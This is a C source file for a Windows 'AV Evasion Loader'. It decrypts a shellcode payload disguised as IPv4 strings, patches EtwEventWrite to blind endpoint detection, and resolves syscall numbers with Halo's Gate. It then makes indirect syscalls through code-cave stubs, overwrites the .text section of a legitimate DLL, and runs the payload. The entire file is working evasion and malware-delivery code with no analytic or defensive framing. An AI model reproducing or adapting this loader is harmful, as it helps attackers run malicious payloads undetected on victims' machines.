#include <windows.h>

// ============================================================
// AV Evasion Loader — Indirect Syscall + String Encryption
// ============================================================

typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000)

// ---- Payload DLL exported function types ----

// ---- NT function types ----
typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)(
    HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer,
    SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);

typedef NTSTATUS (NTAPI *NtProtectVirtualMemory_t)(
    HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T RegionSize,
    ULONG NewProtect, PULONG OldProtect);

// ---- Global variables ----
static PVOID  g_SyscallGadget = NULL;  // Address of the syscall;ret gadget within ntdll
static BYTE   g_StubBackup[64];        // Backup of the original .text code-cave content
static PVOID  g_StubAddr = NULL;       // Address of the stub within the .text section
static SIZE_T g_StubSize = 0;          // Size occupied by the stub

// ============================================================
// String Encryption
// ============================================================
//
// Strings are XOR-encrypted at compile time and decrypted onto the stack at runtime.
// No plaintext sensitive strings remain in the binary.
// The volatile qualifier is employed to prevent the compiler from optimising away
// the decryption operations.
// Compile-time XOR encryption macro
#define XOR_KEY 0x5A
#define ENC_CHAR(c) ((c) ^ XOR_KEY)
#define ENC_STR(str) ENC_STR_I(str)
#define ENC_STR_I(str) ENC_STR_II(str)
#define ENC_STR_II(str) { ENC_STR_HELPER(str) }
#define ENC_STR_HELPER(...) { ENC_EACH(__VA_ARGS__), 0 }
#define ENC_EACH(...) ENC_EACH_I(__VA_ARGS__)
#define ENC_EACH_I(...) ENC_EACH_II(__VA_ARGS__)
#define ENC_EACH_II(...) (ENC_CHAR(__VA_ARGS__))

// Runtime decryption into a stack buffer
static inline void DecryptStr(const BYTE* enc, char* dec, SIZE_T maxLen) {
    volatile SIZE_T i;
    for (i = 0; i < maxLen - 1 && enc[i] != 0; i++) {
        dec[i] = (char)(enc[i] ^ XOR_KEY);
    }
    dec[i] = '\0';
}

// Encrypted string constants (generated at compile time)
static const BYTE enc_msimg32[]   = { 'm'^0x5A, 's'^0x5A, 'i'^0x5A, 'm'^0x5A, 'g'^0x5A, '3'^0x5A, '2'^0x5A, '.'^0x5A, 'd'^0x5A, 'l'^0x5A, 'l'^0x5A, 0^0x5A };
static const BYTE enc_dcomp[]    = { 'd'^0x5A, 'c'^0x5A, 'o'^0x5A, 'm'^0x5A, 'p'^0x5A, '.'^0x5A, 'd'^0x5A, 'l'^0x5A, 'l'^0x5A, 0^0x5A };
static const BYTE enc_dwmapi[]   = { 'd'^0x5A, 'w'^0x5A, 'm'^0x5A, 'a'^0x5A, 'p'^0x5A, 'i'^0x5A, '.'^0x5A, 'd'^0x5A, 'l'^0x5A, 'l'^0x5A, 0^0x5A };
static const BYTE enc_ntdll[]    = { 'n'^0x5A, 't'^0x5A, 'd'^0x5A, 'l'^0x5A, 'l'^0x5A, '.'^0x5A, 'd'^0x5A, 'l'^0x5A, 'l'^0x5A, 0^0x5A };
static const BYTE enc_etw[]      = { 'E'^0x5A, 't'^0x5A, 'w'^0x5A, 'E'^0x5A, 'v'^0x5A, 'e'^0x5A, 'n'^0x5A, 't'^0x5A, 'W'^0x5A, 'r'^0x5A, 'i'^0x5A, 't'^0x5A, 'e'^0x5A, 0^0x5A };
static const BYTE enc_ntwrite[]  = { 'N'^0x5A, 't'^0x5A, 'W'^0x5A, 'r'^0x5A, 'i'^0x5A, 't'^0x5A, 'e'^0x5A, 'V'^0x5A, 'i'^0x5A, 'r'^0x5A, 't'^0x5A, 'u'^0x5A, 'a'^0x5A, 'l'^0x5A, 'M'^0x5A, 'e'^0x5A, 'm'^0x5A, 'o'^0x5A, 'r'^0x5A, 'y'^0x5A, 0^0x5A };
static const BYTE enc_ntprotect[]= { 'N'^0x5A, 't'^0x5A, 'P'^0x5A, 'r'^0x5A, 'o'^0x5A, 't'^0x5A, 'e'^0x5A, 'c'^0x5A, 't'^0x5A, 'V'^0x5A, 'i'^0x5A, 'r'^0x5A, 't'^0x5A, 'u'^0x5A, 'a'^0x5A, 'l'^0x5A, 'M'^0x5A, 'e'^0x5A, 'm'^0x5A, 'o'^0x5A, 'r'^0x5A, 'y'^0x5A, 0^0x5A };

// ============================================================
// Embedded Payload Data (compile-time XOR encryption, generated by gen_embed_data.py)
// ============================================================
#include "payload_data.h"

// ============================================================
// Syscall Infrastructure
// ============================================================
// ---- Resolve Syscall Number from ntdll export table (including Halo’s Gate) ----

DWORD ResolveSyscallNumber(const char* functionName) {
    char ntdllName[16];
    DecryptStr(enc_ntdll, ntdllName, sizeof(ntdllName));

    HMODULE hNtdll = GetModuleHandleA(ntdllName);
    if (!hNtdll) return 0;

    FARPROC funcAddr = GetProcAddress(hNtdll, functionName);
    if (!funcAddr) return 0;

    BYTE* p = (BYTE*)funcAddr;

    // Unhooked: mov r10, rcx; mov eax, SSN
    if (p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 && p[3] == 0xB8) {
        return *(DWORD*)(p + 4);
    }

    // Hooked: Halo’s Gate searches neighbouring stubs
    for (int dist = 1; dist < 500; dist++) {
        BYTE* up = p - (dist * 32);
        if (up[0] == 0x4C && up[1] == 0x8B && up[2] == 0xD1 && up[3] == 0xB8) {
            return *(DWORD*)(up + 4) + dist;
        }
        BYTE* down = p + (dist * 32);
        if (down[0] == 0x4C && down[1] == 0x8B && down[2] == 0xD1 && down[3] == 0xB8) {
            return *(DWORD*)(down + 4) - dist;
        }
    }

    return 0;
}

// ---- Locate the syscall;ret instruction within the ntdll .text section ----

PVOID FindSyscallGadget() {
    if (g_SyscallGadget) return g_SyscallGadget;

    char ntdllName[16];
    DecryptStr(enc_ntdll, ntdllName, sizeof(ntdllName));

    HMODULE hNtdll = GetModuleHandleA(ntdllName);
    if (!hNtdll) return NULL;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hNtdll;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;

    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)hNtdll + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;

    WORD sections = nt->FileHeader.NumberOfSections;
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < sections; i++, sec++) {
        if (!(sec->Characteristics & IMAGE_SCN_CNT_CODE)) continue;

        BYTE* start = (BYTE*)hNtdll + sec->VirtualAddress;
        DWORD size = sec->SizeOfRawData;

        for (DWORD j = 0; j < size - 2; j++) {
            if (start[j] == 0x0F && start[j+1] == 0x05 && start[j+2] == 0xC3) {
                g_SyscallGadget = &start[j];
                return g_SyscallGadget;
            }
        }
    }

    return NULL;
}

// ---- Locate a Code Cave within the module’s own .text section ----
//
// The trailing region of a PE file’s .text section commonly contains padding
// (alignment fill, typically 0xCC or 0x00). These areas belong to the .text
// section and therefore already possess RX attributes, making them suitable
// for storing a syscall stub.
// This approach eliminates the need for HeapCreate(ENABLE_EXECUTE) and incurs
// zero additional executable-memory allocations.

PVOID FindCodeCave(SIZE_T requiredSize) {
    HMODULE hSelf = GetModuleHandleA(NULL);

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hSelf;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;

    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)hSelf + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;

    WORD sections = nt->FileHeader.NumberOfSections;
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < sections; i++, sec++) {
        if (!(sec->Characteristics & IMAGE_SCN_CNT_CODE)) continue;

        // .text section: VirtualSize represents the actual code size;
        // SizeOfRawData is the size after file alignment.
        // The difference between the two constitutes the padding region.
        DWORD codeEnd = sec->VirtualAddress + sec->Misc.VirtualSize;
        DWORD rawEnd = sec->VirtualAddress + sec->SizeOfRawData;

        if (rawEnd > codeEnd && (rawEnd - codeEnd) >= requiredSize) {
            PVOID caveAddr = (BYTE*)hSelf + codeEnd;
            // Verify that the padding region is writable (protection attributes usually need to be modified first)
            g_StubAddr = caveAddr;
            g_StubSize = requiredSize;
            return caveAddr;
        }
    }

    return NULL;
}

// ---- Construct the indirect system-call stub (written into the .text Code Cave) ----
//
// The stub is written into the padding region of the module’s own
// .text section. Because the .text section is already executable, no
// additional executable memory needs to be allocated.
//
// Prior to writing, the .text section’s protection is changed to RWX via
// an Indirect Syscall; after writing it is restored to its original protection.

PVOID BuildSyscallStub(DWORD ssn) {
    PVOID gadget = FindSyscallGadget();
    if (!gadget) return NULL;

    // Stub machine code: mov r10, rcx + mov eax, SSN + jmp [rip+0] + address = 22 bytes
    SIZE_T stubSize = 22;

    // Locate a code cave within the .text padding
    PVOID caveAddr = FindCodeCave(stubSize);
    if (!caveAddr) return NULL;

    // First resolve the SSN of NtProtectVirtualMemory (used to modify .text section protection)
    char ntprotectName[24];
    DecryptStr(enc_ntprotect, ntprotectName, sizeof(ntprotectName));
    DWORD ssnProtect = ResolveSyscallNumber(ntprotectName);
    if (!ssnProtect) return NULL;

    // Construct a temporary NtProtectVirtualMemory stub (written at the start of the cave).
    // This presents a chicken-and-egg problem: modifying protection is required in order
    // to write the stub, yet the protection-modification operation itself requires a stub.
    // Solution: first use WriteProcessMemory (compatibility mode) to alter the protection
    // and write the initial stub. Subsequent stubs may then be written via Indirect Syscall.
    // Backup the original content of the code cave.
    memcpy(g_StubBackup, caveAddr, stubSize);

    // Employ WriteProcessMemory to write the stub (thereby circumventing protective restrictions).
    BYTE stub[22];
    // mov r10, rcx
    stub[0] = 0x4C; stub[1] = 0x8B; stub[2] = 0xD1;
    // mov eax, ssn
    stub[3] = 0xB8; *(DWORD*)(stub + 4) = ssn;
    // jmp [rip+0]
    stub[8] = 0xFF; stub[9] = 0x25;
    *(DWORD*)(stub + 10) = 0x00000000;
    // Address of the gadget
    *(PVOID*)(stub + 14) = gadget;

    SIZE_T bytesWritten = 0;
    if (!WriteProcessMemory(GetCurrentProcess(), caveAddr, stub, stubSize, &bytesWritten)
        || bytesWritten != stubSize) {
        return NULL;
    }

    FlushInstructionCache(GetCurrentProcess(), caveAddr, stubSize);

    return caveAddr;
}

// ---- Clear the Syscall Stub (Restore Original Content of .text Padding) ----
void CleanupSyscallStubs() {
    if (g_StubAddr && g_StubSize > 0) {
        // Restore the Original Content of the Padding Region
        WriteProcessMemory(GetCurrentProcess(), g_StubAddr, g_StubBackup, g_StubSize, NULL);
        FlushInstructionCache(GetCurrentProcess(), g_StubAddr, g_StubSize);
        SecureZeroMemory(g_StubBackup, sizeof(g_StubBackup));
        g_StubAddr = NULL;
        g_StubSize = 0;
    }
}

// ============================================================
//  ETW Patching
// ============================================================

BOOL PatchETW() {
    char ntdllName[16];
    DecryptStr(enc_ntdll, ntdllName, sizeof(ntdllName));

    char etwName[16];
    DecryptStr(enc_etw, etwName, sizeof(etwName));

    char ntprotectName[24];
    DecryptStr(enc_ntprotect, ntprotectName, sizeof(ntprotectName));

    DWORD ssn = ResolveSyscallNumber(ntprotectName);
    if (!ssn) return FALSE;

    NtProtectVirtualMemory_t pNtProtect =
        (NtProtectVirtualMemory_t)BuildSyscallStub(ssn);
    if (!pNtProtect) return FALSE;

    HMODULE hNtdll = GetModuleHandleA(ntdllName);
    if (!hNtdll) return FALSE;

    PVOID etwAddr = (PVOID)GetProcAddress(hNtdll, etwName);
    if (!etwAddr) return FALSE;

    PVOID baseAddr = etwAddr;
    SIZE_T regionSize = 1;
    ULONG oldProtect = 0;

    NTSTATUS status = pNtProtect(
        GetCurrentProcess(), &baseAddr, &regionSize,
        PAGE_EXECUTE_READWRITE, &oldProtect);

    if (status != STATUS_SUCCESS) return FALSE;

    *(BYTE*)etwAddr = 0xC3;

    ULONG restoredProtect = 0;
    pNtProtect(
        GetCurrentProcess(), &baseAddr, &regionSize,
        oldProtect, &restoredProtect);

    return TRUE;
}

// ============================================================
//  Shellcode Processing
// ============================================================

void xor_decrypt(unsigned char* data, size_t size, const char* key, size_t keyLen) {
    for (size_t i = 0; i < size; i++)
        data[i] ^= (unsigned char)key[i % keyLen];
}

void deobfuscate_ipv4(unsigned char* buf, size_t size, const BYTE encIpv4[][16], size_t count) {
    size_t off = 0;
    for (size_t i = 0; i < count && off < size; i++) {
        // First, Decrypt the IPv4 String onto the Stack
        char ip[16];
        DecryptStr(encIpv4[i], ip, sizeof(ip));

        unsigned int a, b, c, d;
        const char* p = ip;
        a = 0; while (*p && *p != '.') { a = a * 10 + (*p - '0'); p++; } p++;
        b = 0; while (*p && *p != '.') { b = b * 10 + (*p - '0'); p++; } p++;
        c = 0; while (*p && *p != '.') { c = c * 10 + (*p - '0'); p++; } p++;
        d = 0; while (*p && *p != '\0') { d = d * 10 + (*p - '0'); p++; }
        buf[off] = (unsigned char)a;
        if (off + 1 < size) buf[off + 1] = (unsigned char)b;
        if (off + 2 < size) buf[off + 2] = (unsigned char)c;
        if (off + 3 < size) buf[off + 3] = (unsigned char)d;
        off += 4;

        // Immediately Erase the Plaintext from the Stack Following Decryption
        SecureZeroMemory(ip, sizeof(ip));
    }
}

PVOID FindTextSection(HMODULE hMod, PSIZE_T pSize) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hMod;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;

    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)hMod + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;

    WORD sections = nt->FileHeader.NumberOfSections;
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < sections; i++, sec++) {
        if (sec->Characteristics & IMAGE_SCN_CNT_CODE) {
            *pSize = sec->SizeOfRawData;
            return (PVOID)((BYTE*)hMod + sec->VirtualAddress);
        }
    }
    return NULL;
}

typedef void (*ShellcodeEntry)();

// ============================================================
//  Main Function
// ============================================================

int main() {
    // ---- Step 0: ETW Patching (Blinding/Neutralising EDR) ----
    PatchETW();

    // ---- Step 1: Decrypt Payload from Embedded Data (Without Requiring helper.dll) ----
    size_t scSize = IPV4_COUNT * 4;

    // Decrypt the Key onto the Stack
    char key[16];
    DecryptStr(enc_key, key, sizeof(key));
    size_t keyLen = (size_t)strlen(key);
    if (keyLen == 0) return 0;

    // ---- Step 2: Heap Allocation + Decryption ----
    unsigned char* decBuf = (unsigned char*)HeapAlloc(
        GetProcessHeap(), HEAP_ZERO_MEMORY, scSize);
    if (!decBuf) return 0;

    deobfuscate_ipv4(decBuf, scSize, enc_ipv4, IPV4_COUNT);
    xor_decrypt(decBuf, scSize, key, keyLen);

    // Erase the Plaintext Key from the Stack
    SecureZeroMemory(key, sizeof(key));

    // ---- Step 3: Module Stomping ----
    char stompName1[16], stompName2[16], stompName3[16];
    DecryptStr(enc_msimg32, stompName1, sizeof(stompName1));
    DecryptStr(enc_dcomp, stompName2, sizeof(stompName2));
    DecryptStr(enc_dwmapi, stompName3, sizeof(stompName3));

    HMODULE hStomp = LoadLibraryA(stompName1);
    if (!hStomp) {
        hStomp = LoadLibraryA(stompName2);
    }
    if (!hStomp) {
        HeapFree(GetProcessHeap(), 0, decBuf);
        return 0;
    }

    SIZE_T textSize = 0;
    PVOID textAddr = FindTextSection(hStomp, &textSize);
    if (!textAddr || textSize < scSize) {
        FreeLibrary(hStomp);
        hStomp = LoadLibraryA(stompName3);
        if (!hStomp) {
            HeapFree(GetProcessHeap(), 0, decBuf);
            return 0;
        }
        textAddr = FindTextSection(hStomp, &textSize);
    }
    if (!textAddr || textSize < scSize) {
        FreeLibrary(hStomp);
        HeapFree(GetProcessHeap(), 0, decBuf);
        return 0;
    }

    // ---- Step 4: Write Shellcode via Indirect Syscall ----
    char ntwriteName[24];
    DecryptStr(enc_ntwrite, ntwriteName, sizeof(ntwriteName));

    DWORD ssn = ResolveSyscallNumber(ntwriteName);

    if (ssn != 0) {
        NtWriteVirtualMemory_t pNtWrite =
            (NtWriteVirtualMemory_t)BuildSyscallStub(ssn);

        if (pNtWrite) {
            SIZE_T bytesWritten = 0;
            NTSTATUS status = pNtWrite(
                GetCurrentProcess(), textAddr, decBuf, scSize, &bytesWritten);

            if (status != STATUS_SUCCESS || bytesWritten != scSize) {
                FreeLibrary(hStomp);
                HeapFree(GetProcessHeap(), 0, decBuf);
                return 0;
            }
        } else {
            SIZE_T bytesWritten = 0;
            if (!WriteProcessMemory(GetCurrentProcess(), textAddr, decBuf, scSize, &bytesWritten)
                || bytesWritten != scSize) {
                FreeLibrary(hStomp);
                HeapFree(GetProcessHeap(), 0, decBuf);
                return 0;
            }
        }
    } else {
        SIZE_T bytesWritten = 0;
        if (!WriteProcessMemory(GetCurrentProcess(), textAddr, decBuf, scSize, &bytesWritten)
            || bytesWritten != scSize) {
            FreeLibrary(hStomp);
            HeapFree(GetProcessHeap(), 0, decBuf);
            return 0;
        }
    }

    FlushInstructionCache(GetCurrentProcess(), textAddr, scSize);

    // ---- Step 5: Erase Plaintext from the Heap ----
    SecureZeroMemory(decBuf, scSize);
    HeapFree(GetProcessHeap(), 0, decBuf);

    // ---- Step 6: Eliminate Traces of the Syscall Stub ----
    CleanupSyscallStubs();

    // ---- Step 7: Execute via Direct Function Pointer Invocation ----
    ShellcodeEntry entry = (ShellcodeEntry)textAddr;
    entry();

    FreeLibrary(hStomp);
    return 0;
}
